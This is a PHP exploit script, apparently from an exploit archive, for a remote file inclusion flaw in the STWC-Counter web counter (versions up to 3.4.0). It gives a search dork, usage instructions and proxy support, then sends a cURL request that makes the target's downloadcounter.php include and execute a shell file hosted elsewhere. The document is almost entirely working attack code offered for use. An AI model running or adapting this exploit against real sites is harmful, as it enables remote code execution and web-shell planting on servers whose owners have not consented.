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STWC-Counter <= 3.4.0 (downloadcounter.php) RFI Exploit
======================================================= STWC-Counter <= 3.4.0 (downloadcounter.php) RFI Exploit ======================================================= <?php //File Inclusion Exploit for STWC-Counter <= //| //Vendor: http://www.stwc-counter.de/ //Dork: www.stwc-counter.de //| //Bug in "downloadcounter.php": //.. //$stwc_verzeichniss = $stwc_counter_verzeichniss; //.. //include($stwc_verzeichniss . "funktionen_intern.php"); //include($stwc_verzeichniss . "einstellungen.php"); //include($stwc_verzeichniss . "funktionen_ausgabe.php"); //.. //include($stwc_verzeichniss . "sprache/deutsch.php"); //.. //include($stwc_verzeichniss . "sprache/english.php"); //.. //| //Usage: php exploit.php [pathtoscript] [pathtoshell] ([proxy:port]) //Example: php exploit.php http://pathtoscript.com/counter/ http://pathtoshell.com/shell.txt? (localhost:8118) //| //Your Box Needs the cURL extension of PHP //The exploit works only with register_globals = On, allow_url_fopen = On and allow_url_include = On PHP settings on the target box //| //Edited 20.05.2007 by ensai (the same person as burncycle ;)) //Added proxy support, working conditions supplemented and easier file inclusion statement //Nur ausnahme Fehler anzeigen error_reporting(1); echo "Usage: php ".$_SERVER["argv"][0]." [pathtoscript] [pathtoshell] ([proxy:port])\r\n\r\n"; echo "Example: php ".$_SERVER["argv"][0]." http://pathtoscript.com/counter/ http://pathtoshell.com/shell.txt? (localhost:8118)\r\n\r\n"; //Schauen ob alles angegeben wurde if(!empty($_SERVER["argv"][1]) && !empty($_SERVER["argv"][2])) { $pathtoscript = $_SERVER["argv"][1]; $pathtoshell = $_SERVER["argv"][2]; //erzeuge ein neues cURL Handle $ch = curl_init(); //proxy setzen if (!empty($_SERVER['argv'][3])) { curl_setopt($ch, CURLOPT_PROXY, $_SERVER['argv'][3]); } //setzte die URL und andere Optionen curl_setopt($ch, CURLOPT_URL, $pathtoscript."downloadcounter.php?stwc_counter_verzeichniss=".$pathtoshell); curl_setopt($ch, CURLOPT_HEADER, 0); //f?hre die Aktion aus curl_exec($ch); //schlie?e das Handle und gebe Systemresourcen frei curl_close($ch); } ?> # 0day.today [2024-12-26] #